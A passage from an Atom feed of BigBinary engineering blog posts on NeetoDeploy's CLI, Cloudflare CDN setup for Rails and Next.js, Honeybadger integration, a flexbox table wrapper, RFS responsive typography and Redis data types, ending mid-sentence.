All of the commands you enter would be run on the console pod through the websocket connection.</p><h3>Streaming logs to the terminal</h3><p>Live logs were streamed to the web dashboard using websockets too. This was also handled by the above-mentioned dyno-console-manager. Since we had written a Ruby websocket client for the <code>exec</code> command, we decided to use the same approach with logs too.</p><p>The CLI would send a request to the dyno-console-manager with the app's name, and the dyno-console-manager would run <code>kubectl logs</code> for your app's deployment and stream it back to the CLI via a websocket connection it creates.</p><p>We took our time with architecting the NeetoDeploy CLI, but thanks to that we learnt a lot about designing robust systems that would scale in the long term.</p><p>If your application runs on Heroku, you can deploy it on NeetoDeploy without any change. If you want to give NeetoDeploy a try, then please send us an email at <a href="mailto:invite@neeto.com">invite@neeto.com</a>.</p><p>If you have questions about NeetoDeploy or want to see the journey, follow NeetoDeploy on <a href="https://twitter.com/neetodeploy">X</a>. You can also join our <a href="https://launchpass.com/neetohq">community Slack</a> to chat with us about any Neeto product.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Using Cloudflare as CDN for Rails applications]]></title>
       <author><name>Abhijith Sheheer</name></author>
      <link href="https://www.bigbinary.com/blog/using-cloudflare-as-cdn-for-rails-applications"/>
      <updated>2023-12-19T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/using-cloudflare-as-cdn-for-rails-applications</id>
      <content type="html"><![CDATA[<p>We use <a href="https://www.cloudflare.com/">Cloudflare</a> as our DNS server. But Cloudflare is much more than a DNS server. It can also be used as a content delivery network (CDN).</p><p>A CDN is a geographically distributed group of servers that cache content close to end users. Let's say that a user from London is hitting a website that has a JavaScript file hosted in Chicago. That JavaScript file has to travel all the way from Chicago to London. This means the site will load slowly.</p><p>A CDN will have a copy of that JavaScript file in London itself. In this way, for that user, the JavaScript file will be loaded from the London server and not from the Chicago server. This is what a CDN primarily does.</p><p>Here's how we set up Cloudflare as a CDN for our Rails applications.</p><h2>1. Configure CNAME record for CDN subdomain in Cloudflare</h2><p>We need a subdomain that will act as a CDN. For <a href="https://www.neeto.com/neetocal">NeetoCal</a>, we use https://cdn.neetocal.com as the subdomain. You can use any subdomain you want.</p><p>To set up this subdomain, follow these steps.</p><ol><li>Add a new record with the <strong>type</strong> <code>CNAME</code>.</li><li>In the <strong>name</strong> field, enter <code>*</code>.</li><li>In the <strong>target</strong> field, enter the URL where the Rails app is deployed.</li></ol><p>If we already have a <code>CNAME</code> record for <code>*</code> that handles all the subdomains, then we don't need to create a new one.</p><p><img src="/blog_images/2023/using-cloudflare-as-cdn-for-rails-applications/create-cname-record.png" alt="Creating CNAME record"></p><h2>2. 
Turn on the Proxy feature in Cloudflare</h2><p>In the previous step, when creating a new <code>CNAME</code> record, Cloudflare will enable the proxy for each record by default.</p><p>Once the <strong>Proxy status</strong> column is turned on, it will display 'Proxied' as shown below.</p><p><img src="/blog_images/2023/using-cloudflare-as-cdn-for-rails-applications/proxy-status-on.png" alt="&quot;Proxy status&quot; turned ON"></p><p>When we turn on &quot;Proxy&quot;, the DNS queries will resolve to the Cloudflare IP address instead of the target. It means Cloudflare will get all the requests, and Cloudflare in turn will forward those requests to the target.</p><p>Let's say that a user from Paris loads a webpage which is hosted in Chicago, and Cloudflare has a server in Paris. When &quot;Proxy&quot; is turned on, the user's first request will go to Cloudflare. Cloudflare doesn't have the JavaScript file, so Cloudflare will forward that request to the server. The server will send the JavaScript file to Cloudflare. Cloudflare will cache this JavaScript file and serve it to the user.</p><p>Two seconds later, another user from a different part of Paris hits the same webpage. This time, Cloudflare has a cached copy of the JavaScript file and will serve it from its server in Paris.</p><p>This has two benefits. The first benefit is that the user gets to see the webpage really fast. The second benefit is that the server cost is a lot lower, since fewer requests need to be served by the server in Chicago.</p><h3>What Cloudflare can cache</h3><p>Cloudflare can only cache files that are stored on the domain that is proxied through Cloudflare. 
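</p><p>The request flow described above can be modeled as a tiny toy cache. This is a simplified sketch for intuition only, not how Cloudflare is implemented, and the function and variable names here are made up for illustration:</p><pre><code class="language-javascript">// Toy model of an edge cache: the first request for a path misses and
// is forwarded to the origin; subsequent requests for the same path
// are served from the edge's cache.
const createEdgeCache = fetchFromOrigin => {
  const cache = new Map();

  return path => {
    if (cache.has(path)) return { status: "HIT", body: cache.get(path) };

    const body = fetchFromOrigin(path);
    cache.set(path, body);

    return { status: "MISS", body };
  };
};

const parisEdge = createEdgeCache(path => `contents of ${path}`);

console.log(parisEdge("/assets/app.js").status); // "MISS" (forwarded to the origin in Chicago)
console.log(parisEdge("/assets/app.js").status); // "HIT" (served from the Paris edge)</code></pre><p>The <code>HIT</code> and <code>MISS</code> statuses here mirror the <code>cf-cache-status</code> response header that Cloudflare sets on proxied responses.</p><p>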
If we have an image file that is stored on Amazon S3 and is accessed via a direct S3 URL, then Cloudflare <strong>won't</strong> be able to cache it.</p><p>Cloudflare caches are based on file extensions, not MIME types. <a href="https://developers.cloudflare.com/cache/about/default-cache-behavior/#default-cached-file-extensions">Here</a> is the list of file extensions that will be cached by default. HTML is not on this list.</p><p>Cloudflare allows us to cache other file types by setting up suitable <a href="https://developers.cloudflare.com/cache/how-to/create-page-rules/">page rules</a>.</p><h2>3. Set appropriate Cache-Control headers in Rails</h2><p>When utilizing Cloudflare as a CDN, it's crucial to configure our Rails app to serve assets with specific <code>Cache-Control</code> headers. This ensures optimal caching behavior for resources.</p><p>The Rails app should serve assets with a header similar to the one given below.</p><pre><code>cache-control: public, max-age=31536000</code></pre><p>The <code>cache-control</code> must be public, and <code>max-age</code> must be a positive value for Cloudflare to <a href="https://developers.cloudflare.com/cache/concepts/default-cache-behavior/#default-cached-behavior">cache the resource</a>.</p><p>For this, we need to modify the Rails configuration file <code>config/environments/production.rb</code>.</p><pre><code class="language-ruby">config.public_file_server.headers = {
  'Cache-Control' =&gt; 'public, max-age=31536000'
}</code></pre><p>Here, <code>Cache-Control</code> is set to 'public', allowing any cache (including Cloudflare) to store the resource. The <code>max-age</code> is specified as 31,536,000 seconds (one year), indicating how long the cache should retain the object before considering it stale.</p><h2>4. 
Configure <code>asset_host</code> in Rails</h2><p>We added the secrets for the <code>asset_host</code> in our Rails application's <code>config/secrets.yml</code> file.</p><pre><code class="language-yml">production:
  asset_host: &lt;%= ENV[&quot;ASSET_HOST&quot;] %&gt;</code></pre><p>We also added an environment variable called <code>ASSET_HOST</code> that contains our new CDN host URL.</p><pre><code>ASSET_HOST=cdn.neetoX.com</code></pre><p>Once this is done, all asset URLs will point to <code>https://cdn.neetoX.com</code>.</p><h2>5. Verify changes</h2><p>Once all the setup is done, it can take a few hours for the changes to be reflected. Hit the page and see the response header of a <code>.js</code> file.</p><p>If the response header <code>cf-cache-status</code> has a value of <code>HIT</code>, then that means Cloudflare is serving that asset from its cache.</p><p><img src="/blog_images/2023/using-cloudflare-as-cdn-for-rails-applications/browser-console-cache-status.png" alt="Viewing cache status in browser console"></p>]]></content>
    </entry><entry>
       <title><![CDATA[Honeybadger frontend integration in Neeto apps]]></title>
       <author><name>Calvin Chiramal</name></author>
      <link href="https://www.bigbinary.com/blog/honeybadger-frontend-integration-in-neeto-apps"/>
      <updated>2023-12-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/honeybadger-frontend-integration-in-neeto-apps</id>
      <content type="html"><![CDATA[<p>At Neeto, we integrated Honeybadger to track all errors in our applications at runtime. We also integrated Honeybadger with GitHub to automatically raise issues in the respective repositories when errors are caught. This blog is an in-depth guide on how we integrated Honeybadger in the frontend part of our web apps.</p><p>For our apps deployed on Heroku, we used the following command to get the latest commit hash as an environment variable on the Heroku server on each build:</p><pre><code class="language-bash">heroku labs:enable runtime-dyno-metadata -a your-app-name</code></pre><p>With NeetoDeploy, we <a href="https://youtu.be/r4g-a6k5SYY?t=176">didn't need this step</a>, since git is available in the console and we used git commands to set the latest commit hash as the Honeybadger revision. Honeybadger uses the <a href="https://docs.honeybadger.io/lib/javascript/guides/using-source-maps/#versioning-your-project">revision</a> to associate source maps with the bundle when the bundle name doesn't change.</p><p>Steps to integrate Honeybadger:</p><ol><li><p>Create a new project in the Honeybadger dashboard. We've made a <a href="https://youtu.be/h5svJ15Vg5Q">video</a> on setting it up following the <a href="https://docs.honeybadger.io/lib/javascript/integration/react/">React integration guide</a>.</p></li><li><p>Set the environment variable <code>HONEYBADGER_JS_API_KEY</code> with the Honeybadger project's API key. 
The API key can be copied from <code>Settings =&gt; API Keys</code>.</p></li></ol><p>In-depth guides for Honeybadger integration &amp; sourcemap upload:</p><ul><li><a href="https://youtu.be/h5svJ15Vg5Q">What is Honeybadger</a></li><li><a href="https://youtu.be/vtIk6g-NekA">Honeybadger integration basics</a></li><li><a href="https://youtu.be/yRrKBnN00Yc">Honeybadger integration in the Neeto ecosystem</a></li><li><a href="https://youtu.be/qZD9pus_9ro">Sourcemaps explained</a></li><li><a href="https://youtu.be/r4g-a6k5SYY">Uploading sourcemaps to Honeybadger</a></li><li><a href="https://youtu.be/tmnxx7HZ5bw">Sourcemaps in action within Honeybadger errors</a></li><li><a href="https://youtu.be/AZZWDMRuuY8">Handling CDN-based application bundles</a></li></ul><p>We've created a YouTube <a href="https://www.youtube.com/playlist?list=PLRpdquznQk7E6UPRx7yyAAJrPYwxXqPS4">playlist</a> of the above videos for easy access.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Using TableWrapper to avoid dynamic height calculations]]></title>
       <author><name>Philson Philip</name></author>
      <link href="https://www.bigbinary.com/blog/using-tablewrapper-to-avoid-dynamic-height-calculation"/>
      <updated>2023-12-07T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/using-tablewrapper-to-avoid-dynamic-height-calculation</id>
      <content type="html"><![CDATA[<h3>Introduction</h3><p>In <a href="https://neeto.com">neeto</a> products, we use lots of listing pages which contain <code>Header</code>, <code>SubHeader</code>, and <code>Table</code> components. The <code>Table</code> component's height is adjusted by inheriting the height of the wrapper that contains it. One common problem for many developers is the need to calculate the height of sibling components and adjust the table wrapper height dynamically. This can often lead to double scroll issues and result in layout inconsistencies. However, we can resolve this issue by using a generic wrapper component called <a href="https://neeto-molecules.neeto.com/?path=/story/tablewrapper--default-wrapper"><code>TableWrapper</code></a>.</p><p>The <code>TableWrapper</code> component serves as a wrapper for a table element. It helps to avoid dynamic height calculations and inconsistent heights for the parent container of the table component.</p><p><code>TableWrapper</code> should be used only with tables in the listing layout as shown below. <code>Container</code> should be the parent component of <code>TableWrapper</code>.</p><pre><code class="language-javascript">&lt;Container&gt;
  &lt;Header /&gt;
  &lt;SubHeader /&gt;
  &lt;TableWrapper&gt;
    &lt;Table columnData={columnData} rowData={rowData} /&gt;
  &lt;/TableWrapper&gt;
&lt;/Container&gt;</code></pre><p><img src="/blog_images/2023/using-tablewrapper-to-avoid-dynamic-height-calculation/tablewrapper-without-pagination.png" alt="Tablewrapper without pagination"></p><p><a href="https://codesandbox.io/s/using-tablewrapper-without-pagination-8w3gur">CodeSandbox Demo</a></p><p><code>TableWrapper</code> is built on the Flexbox CSS layout model, which provides a more efficient way of arranging and aligning elements within a container.
It eliminates the need for complicated height calculations and offers a flexible and intuitive approach to building responsive designs.</p><p>One of the major advantages of using Flexbox is that it allows you to create layouts without relying on dynamic height calculations. Traditionally, when working with CSS, you often need to calculate and set heights for elements to ensure they align properly. This becomes especially challenging when dealing with varying content lengths or responsive designs.</p><p>Flexbox solves this problem by providing a set of properties that control the distribution and alignment of elements within a container. Instead of setting explicit heights, you can let Flexbox handle the vertical alignment automatically based on the content and container dimensions.</p><h3>Key Flexbox properties for height control</h3><ol><li><p><code>display: flex;</code>: By applying this property to the container, you activate the Flexbox layout model. It transforms the container into a flex container, allowing you to control the behaviour of its child elements.</p></li><li><p><code>flex-direction: row/column;</code>: This property defines the direction in which the flex items are laid out within the container. By default, it is set to <code>row</code>, which arranges the items horizontally. However, you can also set it to <code>column</code> to create a vertical arrangement.</p></li><li><p><code>align-items: flex-start/center/flex-end;</code>: This property aligns the flex items along the cross-axis of the container. Setting it to <code>flex-start</code> aligns the items at the top, <code>center</code> aligns them in the middle, and <code>flex-end</code> aligns them at the bottom.</p></li><li><p><code>flex-grow: 1;</code>: This property allows the flex items to grow and occupy the available space within the container. Setting it to 1 ensures that the items expand to fill any remaining space vertically.</p></li><li><p><code>min-height: 0;</code>: The min-height CSS property sets the minimum height of an element.
It prevents the used value of the height property from becoming smaller than the value specified for min-height.</p></li></ol><h3>Benefits of using Flexbox for height control</h3><ol><li><p><strong>Simplified Layouts</strong>: Flexbox eliminates the need for complex height calculations, making your CSS code simpler and easier to maintain.</p></li><li><p><strong>Responsive Design</strong>: Flexbox naturally adapts to different screen sizes and orientations, providing a responsive layout without the need for media queries or explicit height adjustments.</p></li><li><p><strong>Dynamic Content</strong>: Flexbox handles varying content lengths effortlessly. Whether you have short or long content, the items will adjust their height accordingly, ensuring a consistent and visually pleasing design.</p></li><li><p><strong>Cross-browser Compatibility</strong>: Flexbox is well-supported by modern browsers, including all major ones, ensuring consistent behaviour across different platforms.</p></li></ol><pre><code class="language-html">&lt;div class=&quot;layout__wrapper&quot;&gt;
  &lt;div class=&quot;layout__container&quot;&gt;
    &lt;!-- Table component --&gt;
  &lt;/div&gt;
&lt;/div&gt;</code></pre><pre><code class="language-css">.layout__wrapper {
  display: flex;
  flex-direction: column;
  flex-grow: 1;
  width: 100%;
  min-height: 0;
  overflow: auto;
}

.layout__container {
  flex-grow: 1;
  min-height: 0;
}</code></pre><h3>Using TableWrapper with a table that contains pagination</h3><p>The <code>TableWrapper</code> height is adjusted to accommodate the pagination element using the <code>hasPagination</code> prop, which accepts a boolean value.
It can be calculated using the <code>totalCount</code> and <code>defaultPageSize</code> values as shown below.</p><pre><code class="language-javascript">&lt;Container&gt;
  &lt;Header /&gt;
  &lt;SubHeader /&gt;
  &lt;TableWrapper hasPagination={totalCount &gt; defaultPageSize}&gt;
    &lt;Table columnData={columnData} rowData={rowData} /&gt;
  &lt;/TableWrapper&gt;
&lt;/Container&gt;</code></pre><p><img src="/blog_images/2023/using-tablewrapper-to-avoid-dynamic-height-calculation/tablewrapper-with-pagination.png" alt="Tablewrapper with pagination"></p><p><a href="https://codesandbox.io/s/using-tablewrapper-with-pagination-z28evs">CodeSandbox Demo</a></p>]]></content>
    </entry><entry>
       <title><![CDATA[Serving assets and images in Next.js from a CDN without Vercel]]></title>
       <author><name>Akash Srivastava</name></author>
      <link href="https://www.bigbinary.com/blog/serving-nextjs-assets-images-cdn"/>
      <updated>2023-11-28T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/serving-nextjs-assets-images-cdn</id>
      <content type="html"><![CDATA[<p><a href="https://neetocourse.com">NeetoCourse</a> allows you to build and sell courses online. <a href="https://courses.bigbinaryacademy.com/">BigBinary Academy</a> runs on NeetoCourse. NeetoCourse uses Next.js to build its pages.</p><p>If one uses Vercel to deploy a Next.js application, Vercel <a href="https://nextjs.org/docs/app/building-your-application/deploying#managed-nextjs-with-vercel">automatically configures a global CDN</a>. However, NeetoCourse is hosted on <a href="https://neetodeploy.com/neetodeploy">NeetoDeploy</a>, our own app deployment platform. This meant we had to figure out how to serve assets and images from a CDN. We like using Cloudflare for various things, and we decided to use Cloudflare as the CDN in this case.</p><p>There are two kinds of files in a server-side rendered Next.js app that can be served from a CDN.</p><ul><li>Assets like server-rendered HTML, CSS, JS, and fonts.</li><li>Public media like images and videos. These typically reside in the public folder.</li></ul><h2>Server rendered assets</h2><p>When Next.js is deployed in production, the <code>next build</code> step puts all server-rendered assets in the <code>.next/static/</code> folder. Next.js provides an option to set a CDN to serve these assets. This can be done by setting the <code>assetPrefix</code> property in <code>next.config.js</code>, where <code>ASSET_HOST</code> is an environment variable that contains the CDN URL.</p><pre><code class="language-js">/* next.config.js */
...
const assetHost = process.env.ASSET_HOST;

const nextConfig = {
  ...
  assetPrefix: isPresent(assetHost) ? assetHost : undefined,
  ...
};

module.exports = nextConfig;</code></pre><p><a href="https://nextjs.org/docs/app/api-reference/next-config-js/assetPrefix">The official doc</a> has more details about it.</p><h3>Result</h3><p>As shown in the pic below, we had a cache hit.
It means the assets are being served from the configured CDN.</p><p><img src="/blog_images/2023/serving-nextjs-assets-images-cdn/cache-hits-assets.png" alt="Cache HITs on server rendered assets"></p><h2>Public media</h2><p>Next.js has an <a href="https://nextjs.org/docs/pages/api-reference/components/image"><code>&lt;Image&gt;</code></a> component that comes with the necessary optimizations out of the box. If we could use the <code>&lt;Image&gt;</code> tag, then our CDN problem would also be solved. However, the <code>&lt;Image&gt;</code> component <a href="https://github.com/vercel/next.js/discussions/18739">does not work well with Tailwind CSS</a>, and we rely heavily on Tailwind CSS.</p><p>Therefore, we loaded images from the public folder using the traditional <code>&lt;img&gt;</code> tag.</p><pre><code class="language-jsx">import React from &quot;react&quot;;

import dottedBackground from &quot;public/index-dotted-bg&quot;;

const HeaderImage = () =&gt; (
  &lt;img
    alt=&quot;dotted background&quot;
    className=&quot;m-0 w-20 md:w-40 lg:w-auto&quot;
    src={dottedBackground}
  /&gt;
);</code></pre><p>However, now images are not optimized by Next.js and are served from the server directly. This is because Next.js <a href="https://nextjs.org/docs/app/api-reference/next-config-js/assetPrefix#:~:text=Files%20in%20the%20public%20folder%3B%20if%20you%20want%20to%20serve%20those%20assets%20over%20a%20CDN%2C%20you%27ll%20have%20to%20introduce%20the%20prefix%20yourself">does not consider</a> media in the public folder as static assets to be sent to the CDN.</p><h3>Configuring CDN</h3><p>Since we had already set up and configured a CDN using Cloudflare, we wrote a util to prefix the source with our asset host if it is present in the app environment.</p><pre><code class="language-js">import { isNotNil } from &quot;ramda&quot;;

export const prefixed = src =&gt;
  src.startsWith(&quot;/&quot;) &amp;&amp; isNotNil(process.env.ASSET_HOST)
    ? 
`${process.env.ASSET_HOST}${src}`
    : src;</code></pre><p>Now we can use <code>prefixed</code> in the <code>&lt;img&gt;</code> tag.</p><pre><code class="language-jsx">import React from &quot;react&quot;;

import { prefixed } from &quot;utils/media&quot;;

const HeaderImage = () =&gt; (
  &lt;img
    alt=&quot;dotted background&quot;
    className=&quot;m-0 w-20 md:w-40 lg:w-auto&quot;
    src={prefixed(&quot;/index-dotted-bg.svg&quot;)}
  /&gt;
);</code></pre><p>We expected that with this configuration, if the <code>ASSET_HOST</code> value was set, the images would be served from the CDN. Otherwise, they would be served from the server.</p><p>The images did load correctly, but the CDN was not able to cache them. All of the requests resulted in <strong>cache misses</strong>.</p><p><img src="/blog_images/2023/serving-nextjs-assets-images-cdn/cache-misses-images.png" alt="Cache MISSes on server rendered images"></p><h3>Solution</h3><p>The CDN was not able to cache the images because the <code>Cache-Control</code> header was not set on them. This header is set by Next.js when the assets are served from the <code>.next/static/</code> folder, but not when they are served from the <code>public</code> folder. In such cases, we have to explicitly configure the header to be sent when a request is made from the CDN.</p><p>So, we ended up adding a custom <code>headers</code> block to <code>next.config.js</code>.</p><pre><code class="language-js">/* next.config.js */
...
const nextConfig = {
  ...
  headers: async () =&gt; [
    {
      source: &quot;/:all*(.png|.jpg|.jpeg|.gif|.svg)&quot;,
      headers: [
        {
          key: &quot;Cache-Control&quot;,
          value: &quot;public, max-age=31536000, must-revalidate&quot;,
        },
      ],
    },
  ],
  ...
};

module.exports = nextConfig;</code></pre><p>This worked.
All subsequent requests from the CDN for public images turned into <strong>cache hits</strong>.</p><h3>Result</h3><p><img src="/blog_images/2023/serving-nextjs-assets-images-cdn/cache-hits-images.png" alt="Cache HITs on server rendered images"></p><h2>Conclusion</h2><ul><li>Use the <code>assetPrefix</code> option in <code>next.config.js</code> to serve server-rendered assets from a CDN.</li><li>Explicitly set the <code>Cache-Control</code> header in <code>next.config.js</code> and ensure image src URLs contain the CDN asset host to serve public images from a CDN.</li></ul>]]></content>
    </entry><entry>
       <title><![CDATA[Perfecting mobile responsiveness on NeetoSite using RFS]]></title>
       <author><name>Praveen Murali</name></author>
      <link href="https://www.bigbinary.com/blog/perfecting-mobile-responsiveness-on-neetosite-using-rfs"/>
      <updated>2023-11-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/perfecting-mobile-responsiveness-on-neetosite-using-rfs</id>
      <content type="html"><![CDATA[<p>&lt;style&gt;table{table-layout:fixed;width: auto !important;}table td,table th{padding:4px 12px !important;}&lt;/style&gt;</p><h3>Introduction</h3><p>Responsive design has become fundamental to modern web development as usersaccess websites from various devices with varying screen sizes.<a href="https://www.neeto.com/neetosite">NeetoSite</a> is a website-building tool by<a href="https://www.neeto.com/">Neeto</a>. We strive for a great user experience on alldevices for sites built using NeetoSite.</p><p>This blog will discuss implementing responsive typography, padding, and marginusing the RFS package.</p><p>At NeetoSite, users can personalize font sizes from the design page. If a userselects the largest font size (<code>9xl</code>) for the <strong>title</strong>, everything looksflawless on the desktop view. However, when switching to mobile, things start tolook a little off. The title appears out of place, and that's because we hadbeen using the same font size for both desktop view and mobile view.</p><p><strong>Desktop view</strong></p><p>&lt;img alt=&quot;desktop view&quot; src=&quot;/blog_images/2023/perfecting-mobile-responsiveness-on-neetosite-using-rfs/desktop.png&quot;&gt;</p><p>&lt;br&gt;</p><p><strong>Mobile view</strong></p><p>&lt;div style=&quot;width:100%;max-width:450px;&quot;&gt;&lt;img alt=&quot;mobile view&quot; src=&quot;/blog_images/2023/perfecting-mobile-responsiveness-on-neetosite-using-rfs/mobile.png&quot;&gt;&lt;/div&gt;</p><h3>Limitations of the Tailwind approach</h3><p>We use Tailwind CSS to create the building blocks of NeetoSite. 
One way to implement responsive typography is to use <a href="https://tailwindcss.com/docs/font-size#breakpoints-and-media-queries">Tailwind's responsive font size classes</a>.</p><p>For example, to make the text <code>60px</code> on large desktop screens, we can use the <code>lg:text-6xl</code> class.</p><pre><code class="language-html">&lt;p class=&quot;lg:text-6xl&quot;&gt;Text&lt;/p&gt;</code></pre><p>Now we need to choose the font sizes for mobile and tablet devices. Let's say we choose <code>30px</code> for mobile and <code>48px</code> for tablets. We need to add additional Tailwind classes:</p><pre><code class="language-html">&lt;p class=&quot;text-3xl md:text-5xl lg:text-6xl&quot;&gt;Responsive text&lt;/p&gt;</code></pre><ul><li>The <code>text-3xl</code> class makes the text <code>30px</code> on mobile.</li><li>The <code>md:text-5xl</code> class sets the font size to <code>48px</code> on tablet devices.</li></ul><p>Now, let's dive into a practical example within NeetoSite. The platform gives users the flexibility to customize font sizes for their content from the design page.</p><p><img src="/blog_images/2023/perfecting-mobile-responsiveness-on-neetosite-using-rfs/example.png" alt="example building block"></p><p>NeetoSite offers a total of 13 font size variants, each associated with its default desktop value, as shown in the table below.</p><table class="font-size-variants-table"><thead><tr><th>Font size variant</th><th>Font size (Desktop)</th></tr></thead><tbody><tr><td>9xl</td><td>4.5rem (72px)</td></tr><tr><td>8xl</td><td>3.75rem (60px)</td></tr><tr><td>7xl</td><td>3rem (48px)</td></tr><tr><td>6xl</td><td>2.5rem (40px)</td></tr><tr><td>5xl</td><td>2.25rem (36px)</td></tr><tr><td>4xl</td><td>2rem (32px)</td></tr><tr><td>3xl</td><td>1.75rem (28px)</td></tr><tr><td>2xl</td><td>1.5rem (24px)</td></tr><tr><td>xl</td><td>1.25rem (20px)</td></tr><tr><td>lg</td><td>1.125rem (18px)</td></tr><tr><td>base</td><td>1rem (16px)</td></tr><tr><td>sm</td><td>0.875rem (14px)</td></tr><tr><td>xs</td><td>0.75rem (12px)</td></tr></tbody></table><p>For each font size variant, <strong>the challenge is to determine the optimal font sizes for tablets and mobile devices</strong>. Once we have chosen the font sizes for mobile and tablet, we need to apply the corresponding Tailwind classes, as shown above. That quickly adds up to a substantial amount of repetitive work.</p><h3>The solution - RFS package</h3><h4>What is RFS?</h4><p>Bootstrap's side project <a href="https://github.com/twbs/rfs">RFS</a> is a unit resizing engine that was initially developed to resize font sizes (hence the abbreviation: Responsive Font Sizes). It's a great tool for creating responsive typography and layouts, as it automatically calculates the appropriate values based on the dimensions of the browser viewport. Nowadays, RFS is capable of rescaling most CSS properties with unit values, like margin, padding, border-radius, or even box-shadow.</p><h4>Using RFS</h4><p>The <code>rfs()</code> mixin provides shorthands for common CSS properties with unit values, such as <code>font-size</code>, <code>margin</code>, and <code>padding</code>. This makes it easy to use RFS to create responsive CSS.</p><p>Importantly, we don't need to worry about creating complex media queries to achieve responsive font sizes.
RFS handles this for us.</p><p>For example, to set the font size of a <code>.title</code> class to be responsive, you would use the following Sass code.</p><pre><code class="language-css">.title {
  @include font-size(4rem);
}</code></pre><p>The above Sass code will generate the following CSS output.</p><pre><code class="language-css">.title {
  font-size: calc(1.525rem + 3.3vw);
}

@media (min-width: 1200px) {
  .title {
    font-size: 4rem;
  }
}</code></pre><p>In the generated CSS, the font size is set to <code>calc(1.525rem + 3.3vw)</code>. This formula takes a base size of <code>1.525rem</code> and adds <code>3.3%</code> of the viewport width (<code>vw</code>). As the viewport width changes, the font size dynamically adjusts to ensure optimal readability and aesthetics. If the viewport width is greater than <code>1200px</code>, the built-in media query in the generated CSS sets the font size back to the user-defined value of <code>4rem</code>.</p><h4>Visualisation</h4><p>The following visualization shows how RFS rescales font sizes based on the viewport width.</p><p>Note that every font size is generated in a combination of <code>rem</code> and <code>vw</code> units, but they are mapped to <code>px</code> in the graph to make it easier to understand.</p><p><img src="/blog_images/2023/perfecting-mobile-responsiveness-on-neetosite-using-rfs/visualisation.png" alt="visualisation"></p><p>The X-axis represents the viewport width in pixels. The Y-axis represents the font size in pixels. The colored lines represent the different font sizes that can be generated using RFS.</p><p>As you can see, the font sizes are scaled down as the viewport width decreases. This ensures that the text is readable on all devices, regardless of the screen size.</p><h3>How we applied RFS on NeetoSite</h3><p>We created custom CSS classes for each font size variant and applied RFS to them.
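As a numeric sanity check of the fluid formula <code>calc(1.525rem + 3.3vw)</code> discussed above, it can be evaluated at a few viewport widths. This is purely an illustrative sketch (not part of RFS), assuming the browser default of 1rem = 16px:

```javascript
// Effective font size in px for `font-size: calc(1.525rem + 3.3vw)`,
// with the generated media query pinning it to 4rem at and above 1200px.
// Assumes a root font size of 16px (the browser default).
const fluidFontSize = viewportPx =>
  viewportPx >= 1200 ? 4 * 16 : 1.525 * 16 + 0.033 * viewportPx;

console.log(fluidFontSize(375));  // ≈ 36.8 — comfortably smaller on a phone
console.log(fluidFontSize(1199)); // ≈ 64 — approaches the cap smoothly
console.log(fluidFontSize(1440)); // 64 — the user-defined 4rem
```

Note how the fluid value just below the breakpoint nearly equals the capped 4rem value, which is why the transition at 1200px is visually seamless.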
RFS automatically calculates the appropriate values based on the browser viewport, so the font size scales down pleasingly.</p><pre><code class="language-css">.ns-font-9xl {
  @include font-size(4.5rem !important);
}

.ns-font-8xl {
  @include font-size(3.75rem !important);
}

.ns-font-7xl {
  @include font-size(3rem !important);
}

.ns-font-6xl {
  @include font-size(2.5rem !important);
}

.ns-font-5xl {
  @include font-size(2.25rem !important);
}

.ns-font-4xl {
  @include font-size(2rem !important);
}

.ns-font-3xl {
  @include font-size(1.75rem !important);
}

.ns-font-2xl {
  @include font-size(1.5rem !important);
}

.ns-font-xl {
  @include font-size(1.25rem !important);
}

.ns-font-lg {
  @include font-size(1.125rem !important);
}

.ns-font-base {
  @include font-size(1rem !important);
}

.ns-font-sm {
  @include font-size(0.875rem !important);
}

.ns-font-xs {
  @include font-size(0.75rem !important);
}</code></pre><p>Similarly, we created custom CSS classes for each padding and margin variant and applied RFS to them.</p><h4>RFS fluid rescaling in action</h4><p><img src="/blog_images/2023/perfecting-mobile-responsiveness-on-neetosite-using-rfs/block.gif" alt="RFS fluid rescaling in action"></p><h3>How RFS transformed NeetoSite</h3><ul><li><p><strong>Improved mobile responsiveness</strong>: With RFS, we were able to effortlessly set responsive font sizes, paddings, and margins for different screen sizes, ensuring a seamless and visually pleasing experience across devices.</p></li><li><p><strong>Simplified user customization</strong>: Users could continue customizing font sizes, but now with the added benefit of automatic responsiveness, eliminating the burden of setting tablet and mobile values manually.</p></li><li><p><strong>Enhanced readability</strong>: RFS helps ensure that the text remains readable at all screen sizes.</p></li><li><p><strong>Improved consistency</strong>: The use of RFS ensures that the typography, padding, and margin of all NeetoSite blocks are consistent across all devices.
This is because it scales all of the padding and margin values based on the same formula.</p></li></ul><div style="width:100%;max-width:450px;"><img alt="difference" src="/blog_images/2023/perfecting-mobile-responsiveness-on-neetosite-using-rfs/difference.gif"></div><h3>See RFS in action</h3><p>Take a look at <a href="https://bigbinaryacademy.com/">BigBinary Academy</a>, a place to learn coding, powered by NeetoSite. Recent changes have brought about a significant improvement in mobile responsiveness. Another example of a successful RFS implementation can be found at https://neetocode.com, a coding platform built by BigBinary.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Deep Dive into Redis Data Types]]></title>
       <author><name>Sreeram Venkitesh</name></author>
      <link href="https://www.bigbinary.com/blog/redis-data-types-deep-dive"/>
      <updated>2023-11-14T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/redis-data-types-deep-dive</id>
      <content type="html"><![CDATA[<p>Last week, while migrating <a href="https://www.neeto.com/neetogit">NeetoGit's</a> production deployment to <a href="https://www.neeto.com/neetodeploy">NeetoDeploy</a>, we faced a challenge. The Redis 7 add-on only had a TLS URL on Heroku. We were not able to get the dump in a straightforward manner using redis-cli, since we didn't have access to the certificates for making a TLS connection. We were able to connect to the add-on, though, so we decided to write a script to manually copy all the keys and values over to the Redis add-on in NeetoDeploy.</p><p>While writing the program, we realized that we'd need a switch-case that checked what data type each key was. We had to search for the get and set methods for each data type manually while writing the program. Later, we used the redis-rb gem and were able to get the dump with <code>OpenSSL::SSL::VERIFY_NONE</code>, but we still faced the issue of having to look up the commands for different data types like zset and hash.</p><p>I thought this could be a good opportunity to write a blog post summarizing all the data types and the commands associated with them. The Redis documentation has a page about the different data types, but not all the commands are available in a single place.</p><h2>Redis key-value database</h2><p>When we say that Redis is a key-value database, there is more to it than what meets the eye. Redis keys can store values 